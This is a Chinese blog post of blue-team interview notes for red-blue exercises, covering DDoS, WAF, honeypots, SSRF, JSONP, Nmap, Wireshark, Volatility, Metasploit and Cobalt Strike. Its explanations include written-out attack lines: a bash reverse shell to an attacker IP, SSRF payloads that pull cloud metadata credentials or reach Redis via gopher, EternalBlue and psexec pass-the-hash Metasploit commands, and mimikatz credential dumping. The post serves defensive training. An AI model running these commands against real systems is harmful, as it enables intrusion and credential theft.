【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDF

admin 2025年5月1日01:27:44评论0 views字数 7664阅读25分32秒阅读模式

📌 导读

全网最全HW蓝队备战指南!从入门到精通 ✅ 基础概念 ✅ 实战案例 ✅ 高阶技巧文末领取《HW防守方(蓝队)面试总结.pdf》+《应急响应手册》

什么是HW行动中的蓝队?

蓝队是网络实战攻防演练中的防守方,负责监控、分析、处置攻击行为,保护目标系统不被攻破,核心任务包括:

- 安全设备策略优化

- 实时攻击监测与预警

- 安全事件溯源分析

- 系统漏洞应急加固

 

-  ............

 

🌟 一、基础概念篇(精选19问)

1.TOP10漏洞有哪些?失效的访问控制、加密机制失效、注入攻击、不安全设计、安全配置错误、过时组件、身份认证错误、数据完整性故障、日志监控故障、SSRF

2.什么是 DDoS 攻击?如何防御

攻击原理:通过海量恶意请求(如 SYN Flood、UDP Flood)耗尽目标服务器的带宽、计算资源或连接数,导致正常用户无法访问服务。防御手段

流量清洗:通过 CDN 节点或专用设备过滤恶意流量(如阿里云盾、腾讯云 DDoS 防护)。

负载均衡:分散流量压力,避免单点过载。
云防护服务:利用云端资源弹性扩展,抵御超大规模攻击(推荐:华为云 DDoS 高防)。

3. DDoS 攻击与 CC 攻击的区别?

DDoS 攻击(分布式拒绝服务) CC 攻击(Challenge Collapsar)
攻击层次
网络层 / 传输层(如 SYN Flood、UDP Flood)
应用层(基于 HTTP/HTTPS 协议,如高频 GET/POST 请求)
核心原理
通过海量无效流量(合法 / 非法包)耗尽目标带宽或连接数
利用合法请求(如模拟浏览器访问)占用服务器计算资源(CPU、内存)
攻击目标
网络资源(带宽、端口连接数)
应用资源(如 Web 服务器的请求处理能力)
流量特征
流量峰值极高(可达数百 Gbps),包类型混杂(如 SYN、ICMP)
流量峰值相对较低,但请求频率极高(如每秒数万次 HTTP 请求)
典型手段
利用僵尸网络(Botnet)发起洪水攻击
通过代理 IP 或肉鸡模拟正常用户访问,绕过简单 IP 封禁
防御重点
流量清洗(过滤无效包)、带宽扩容
应用层限速(限制单 IP 请求频率)、验证码校验、会话保持机制

4.黑盒测试与白盒测试的区别?

维度 黑盒测试 白盒测试
视角
模拟用户,仅关注输入输出
基于源码 / 架构,分析内部逻辑与漏洞
权限
无源码访问权限
可读取 / 修改代码、调试接口
典型场景
功能验证、边界测试
代码审计(如 SQL 注入漏洞定位)
5.正向 Shell 与反向 Shell 的区别

 正向 Shell:攻击者主动连接目标主机(如telnet 目标IP 端口),需目标开放端口,易被防火墙拦截。

反向 Shell:目标主机主动连接攻击者(如bash -i >& /dev/tcp/攻击IP/端口 0>&1),可绕过防火墙,适用于复杂网络环境(如企业内网渗透)。

6.序列化与反序列化的安全风险

序列化将对象转为字节流,反序列化可能触发恶意代码执行(如WebLogic T3协议漏洞)

7.CDN验证方法?

- 多地Ping检测IP唯一性

- `nslookup`解析差异

- 历史DNS记录查询

8. WAF 与防火墙的区别?

一句话总结:一个守 “应用大门”,一个守 “网络关卡”。

WAF(Web 应用防火墙):专注 HTTP/HTTPS 层(七层)防护,针对 Web 应用攻击(如 SQL 注入、XSS、文件上传漏洞)。▶ 典型功能:过滤恶意请求参数、阻断异常流量、保护 API 接口。▶ 部署方式:云 WAF(如阿里云盾)、硬件 WAF、软件插件(如 ModSecurity)。

防火墙(Firewall):▶ 控制 网络层 / 传输层(三 / 四层)流量,基于 IP、端口、协议规则过滤(如禁止外部访问 3389 端口)。▶ 典型功能:隔离内外网、阻止非法端口连接、防御 DDoS 流量洪水。▶ 分类:包过滤防火墙、状态检测防火墙、下一代防火墙(NGFW,集成 IPS/IDS)。

PS:下一代防火墙基本都集成了waf模块,这里只是从传统意义上讲啊

9. 蜜罐的作用及被攻击时的处理?

蜜罐:网络世界的 “诱饵陷阱”

  • 核心作用✅ 诱捕攻击者:模拟脆弱服务(如开放 RDP、SSH 端口),吸引黑客攻击,减少真实系统风险。✅ 攻击分析:记录攻击手法(如使用的漏洞、工具、C2 通信),为防御策略提供依据。✅ 威胁情报:通过蜜罐日志分析 APT 组织活动,预判攻击趋势。
  • 被攻击时的处理流程① 隔离流量:立即断开蜜罐与生产网络的连接(如禁用网卡、封禁攻击 IP)。② 全量取证:镜像内存数据、保存日志文件(包括网络流量、操作记录),用于逆向分析。③ 特征提取:从攻击载荷中提取恶意代码哈希、C2 域名 / IP,更新入侵检测规则。④ 安全加固:检查蜜罐自身漏洞(如是否被植入后门),修复后重新部署。

10. SSRF 漏洞原理及利用场景?

是一种通过控制服务器发起网络请求的漏洞,攻击者利用存在缺陷的Web应用作为代理,绕过网络边界限制,直接攻击内网或云环境中的敏感资源。

三大典型场景

  • 内网服务测绘与端口扫描
    • 攻击手法:通过构造恶意URL参数(如http://127.0.0.1:8080),诱导服务器扫描内网IP段(如192.168.0.0/24),探测Redis(6379)、MySQL(3306)、Consul(8500)等服务的开放状态。
    • HW案例:某厂商文件上传接口存在SSRF,攻击队利用dict://127.0.0.1:6379/info成功获取Redis未授权访问权限,写入SSH密钥实现提权。
  • 云元数据服务窃取
    • 攻击目标:AWS/Aliyun/腾讯云等云服务器的元数据接口(如http://169.254.169.254)。
    • 利用链
    • GET /api?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role HTTP/1.1

      → 获取临时AK/SK → 通过AWS CLI接管云主机。

    • 防御关键:禁用IMDSv1,强制使用IMDSv2(需携带Token)。
  • 攻击内网脆弱组件
    • Kubernetes API Server(8080/6443):未鉴权执行Pod创建。
    • Jenkins(8080):通过/script接口执行Groovy命令。
    • Hadoop YARN(8088):利用REST API部署恶意任务。
    • 典型场景
    • Payload示例
    • http://内网IP:8088/ws/v1/cluster/apps/new-application → 提交恶意作业
  • 协议滥用与文件泄露
    • file协议file:///etc/passwd 读取服务器本地文件。
    • gopher协议:构造Redis命令执行(需CRLF编码):

      text

    • 危险协议利用(写入定时任务)
    • gopher://127.0.0.1:6379/_*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$57%0d%0a...
    • dict协议:探测服务指纹(如dict://127.0.0.1:6379/info)。
  • 防御方案:禁用非常用协议,使用URL解析库严格校验Schema。
  • 绕过IP白名单限制
    • 场景:某内部API仅允许192.168.1.0/24访问,攻击者通过SSRF构造请求头X-Forwarded-For: 192.168.1.100,伪装成内网IP绕过校验。
    • 检测要点:审查代码中是否存在通过X-Forwarded-For等客户端可控头进行IP验证的逻辑。
  • 供应链攻击跳板
    • 利用链:存在SSRF的第三方服务(如邮件解析、PDF生成)被攻击者操控,向其内部系统发起请求(如OA、GitLab),形成穿透攻击。
    • HW案例:攻击队利用某CMS的Webhook功能SSRF漏洞,将恶意请求转发至企业内部的Jenkins构建服务器,触发RCE。

11. 常见端口及服务对应表(必背清单)

端口
服务 / 协议
风险提示
22
SSH(远程管理)
弱密码攻击高发,建议改用证书认证
80
HTTP(明文传输)
易被中间人攻击,推荐强制 HTTPS
443
HTTPS(加密传输)
需定期更新证书,警惕过期漏洞
3306
MySQL(数据库)
暴露外网时需 IP 白名单 + 强密码策略
5900
VNC(图形化远程控制)
无认证或弱密码易被接管桌面
6379
Redis(键值数据库)
未授权访问可致数据泄露 / 删除
7001
WebLogic(Java 应用服务器)
历史漏洞多(如反序列化漏洞 CVE-2023-21839)

12. 如何绕过 CDN 获取真实 IP?

CDN(内容分发网络)通过节点隐藏真实服务器 IP,实战中可尝试以下方法 “破冰”:

三大实用技巧

  • ① 子域名解析法▶ 原理:部分子域名未启用 CDN,直接解析到真实 IP。▶ 操作:使用nslookupdig工具查询所有子域名(如*.yourdomain.com),对比 IP 是否一致。
  • ② 邮件服务器泄露▶ 原理:企业邮箱服务器(如mail.yourdomain.com)常部署在内部网络,未经过 CDN。▶ 操作:发送测试邮件,查看邮件头中的Received字段,提取服务器 IP。
  • ③ F5 LTM 解码法▶ 原理:F5 负载均衡设备的 Cookie(如BIGipServer)包含真实服务器节点信息。▶ 操作:解析 Cookie 值(格式为节点ID.虚拟服务器ID.负载均衡组ID),转换为 IP 地址(需工具辅助)。
  • 补充技巧✅ 利用历史 DNS 记录(如Censys、SecurityTrails查询域名历史解析 IP)。

    ✅ 检查网站错误页面:部分错误信息(如 500 内部错误)可能泄露真实 IP。

    ✅ 检查网站JS文件:可能泄露真实 IP。

13.JSONP跨域数据请求技术原理

JSONP(JSON with Padding) 是一种绕过浏览器同源策略的跨域数据交互技术,核心原理是通过动态创建<script>标签加载外部资源,利用回调函数处理返回数据。

实现流程

  1. 客户端定义回调函数:
  • functionhandleResponse(data){   console.log('Received:', data);}
  • 动态插入脚本标签发起请求:
  • const script = document.createElement('script');
  • script.src ='https://api.example.com/data?callback=handleResponse';document.body.appendChild(script);
  • 服务端返回包装后的JSON数据:
  • handleResponse({"user":"admin","email":"[email protected]"});

HW攻防中的JSONP漏洞利用场景:

1)敏感数据窃取(JSONP劫持)

攻击手法:构造恶意页面诱导用户点击,窃取登录态下的敏感信息:

【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDF

典型案例:某社交平台用户资料接口未校验Referer,攻击者通过钓鱼邮件诱导用户访问恶意页面,窃取用户好友列表和手机号。

2)参数污染绕过防护

绕过技巧:当服务端仅校验callback参数合法性时,使用多重回调参数穿透过滤:

  • GET/api?callback=validFunc&callback=maliciousFunc HTTP/1.1
  • 漏洞成因

    服务端代码错误处理参数(如PHP的$_GET['callback']默认取最后一个值)。

3)SSRF组合攻击

  • 攻击链:通过存在SSRF的接口调用内部JSONP端点,实现内网探测:
  • GET /ssrf?url=http://internal-api:8080/data?callback=alert# HTTP/1.1
  • HW实战:某企业监控系统JSONP接口暴露内网Zabbix服务器信息(IP: 10.10.5.23),攻击队利用此接口绘制内网拓扑。

14.JSONP跨域数据请求防御与检测方案

防御:

1)输入输出过滤

  • 回调函数白名单:使用正则表达式严格限制callback参数格式(如只允许字母数字):
    【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDF
  • 响应头加固:强制添加Content-Type: application/json,避免浏览器执行恶意脚本。

2)访问控制策略

  • Referer校验(nginx:验证请求来源域名是否在白名单内:
    【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDF
    • Token鉴权:要求携带一次性Token参数(如?token=7a3b9c),与服务端Session绑定验证。

3)替代技术方案

  • CORS(跨域资源共享):使用标准跨域方案替代JSONP,配置精细化的Access-Control-Allow-Origin
  • JSON with nonce:动态生成随机数防御XSS:
    【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDF
攻击行为监测:
    • 高频调用不同callback函数名(如每秒10次以上)
    • Referer来源为未知域名或空值
    • User-Aent包含Headless浏览器特征(如PhantomJS)
    • 异常请求特征
    • 日志分析规则示例(ELK)
【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDF

15.Nmap常用扫描参数及作用

1) 基础扫描类型

  • -sS(TCP SYN扫描)作用:发送SYN包,根据响应判断端口状态(开放/关闭)。特点:半开放扫描,速度快且隐蔽性强(不完成TCP三次握手)。
  • -sT(TCP连接扫描)作用:建立完整TCP连接,直接确认端口可用性。场景:绕过简单防火墙(如未过滤SYN包但拦截其他类型包)。
  • -sU(UDP扫描)作用:检测UDP端口开放状态(如DNS-53、SNMP-161)。缺陷:速度慢(需等待ICMP不可达响应)。

2) 端口与主机管理

  • -p <端口范围>示例:-p 80,443(指定端口)或-p 1-1000(范围扫描)。
  • --top-ports <数量>示例:--top-ports 100(扫描最常见100个端口)。
  • -Pn(跳过主机发现)场景:直接扫描目标IP,忽略ICMP存活检测。

3) 服务与系统识别

  • -sV(版本探测)作用:识别服务及版本(如Apache 2.4.39)。
  • -O(操作系统检测)原理:通过TCP/IP协议栈指纹匹配操作系统类型。

4) 输出与性能优化

  • -oN/-oX/-oG作用:分别输出为文本、XML、Grepable格式。
  • -T<0-5>(时间模板)示例:-T4(激进模式,快速扫描)。

防御检测

  • 监控异常SYN请求频率(如每秒超过50次)。
  • 识别Nmap默认的TCP窗口大小(如10536)。

16.Wireshark抓包过滤规则示例

1) 基础过滤

  • 协议过滤tcp(仅显示TCP流量)udp.port == 53(DNS查询)
  • IP地址过滤ip.src == 192.168.1.100(来源IP)ip.dst == 10.0.0.1(目标IP)

2) 高级特征过滤

  • HTTP请求提取http.request.method == "GET"(所有GET请求)http.host contains "example.com"(特定域名)
  • 异常流量识别tcp.flags.syn == 1 and tcp.flags.ack == 0(SYN扫描特征)tcp.analysis.retransmission(TCP重传包)

3) 组合逻辑过滤

  • and/or逻辑ip.src == 10.0.0.5 and tcp.port == 445(来自10.0.0.5的SMB流量)
  • 排除特定流量!arp(排除ARP广播包)

17. Volatility内存分析流程

1) 确定内存镜像类型命令:volatility -f <镜像文件> imageinfo输出:建议的Profile(如Win10x64_19041)。

2) 进程与网络分析

  • 进程列表pslist(显示活动进程)重点:查找无父进程、路径异常的进程(如C:Tempbad.exe)。
  • 网络连接netscan(显示TCP/UDP连接)异常:外部IP的长时间连接(如与C2服务器通信)。

3) 恶意代码检测

  • DLL检查dlllist -p <PID>场景:查找恶意注入的DLL(如无签名模块)。
  • 代码注入检测malfind特征:内存段具有可执行权限(如PAGE_EXECUTE_READWRITE)。

4) 文件与注册表取证

  • 文件提取dumpfiles -Q <物理地址> -D <输出目录>用途:提取恶意PE文件或文档。
  • 注册表分析

    printkey -K "SoftwareMicrosoftWindowsCurrentVersionRun"目标:检查自启动项中的可疑条目。

5) 用户活动追踪

  • 剪切板记录clipboard
  • 命令行历史cmdline(显示进程命令行参数)

18. Metasploit渗透测试流程

1) 信息收集

  • 模块auxiliary/scanner示例:
    use auxiliary/scanner/ssh/ssh_login   set RHOSTS 10.0.0.0/24   set USER_FILE users.txt   run

2) 漏洞利用

  • 选择Exploituse exploit/windows/smb/ms17_010_eternalblue
  • 配置参数
    set RHOST 192.168.1.10   set PAYLOAD windows/x64/meterpreter/reverse_tcp   set LHOST 攻击机IP   exploit

3) 后渗透操作

  • Meterpreter常用命令
    • getuid:查看当前权限
    • hashdump:提取密码哈希
    • screenshot:截取目标屏幕
  • 权限提升
    use post/windows/escalate/bypassuac   set SESSION 1   run

4) 横向移动

  • 传递攻击
  • use exploit/windows/smb/psexec   set SMBUser admin   set SMBPass 哈希值   exploit

防御建议

  • 监控msfvenom生成的Shellcode特征(如固定头字节)。
  • 分析异常进程间通信(如svchost.exe启动子进程)。

19.CS(Cobalt Strike)常用功能

1) 监听器(Listeners)

  • HTTP/HTTPS Beacon:模拟Web流量绕过检测。
  • DNS Beacon:通过DNS查询实现隐蔽通信。

2) 攻击载荷生成

  • 生成恶意文件
    Attacks → Packages → Windows Executable

    选项:选择Stageless、混淆Shellcode。

3) 横向移动技术

  • Psexec横向渗透:通过SMB协议在域内扩散。
  • 凭证窃取
  • beacon>mimikatz sekurlsa::logonpasswords

4) 钓鱼攻击

  • 邮件模板克隆:复制企业OA登录页面。
  • 宏文档生成:嵌入恶意VBA代码的Office文件。

5) 协同作战

  • 团队服务器(Team Server):多人协作管理多个目标。
  • 日志聚合:记录所有攻击活动与受害者信息。

蓝队检测重点

  • 识别Beacon心跳包特征(如固定心跳间隔)。
  • 分析HTTP头部异常字段(如Cookie: session=xxxx;格式固定)。

写在最后:

Q3 防守方必做的3件"脏活累活":1️⃣ 清理离职人员账号(重点查VPN权限)2️⃣ 关闭闲置端口(全网扫描报告比对)3️⃣ 更新蜜罐诱饵数据(伪造财务/研发文档)

原文始发于微信公众号(瓜神网络安全&分享):【持续更新】万字精编:HW防守方(蓝队)面试总结--基础篇,附PDF

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年5月1日01:27:44
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【持续更新】万字精编:HW防守方(蓝队)面试总结基础篇,附PDFhttps://cn-sec.com/archives/4020650.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息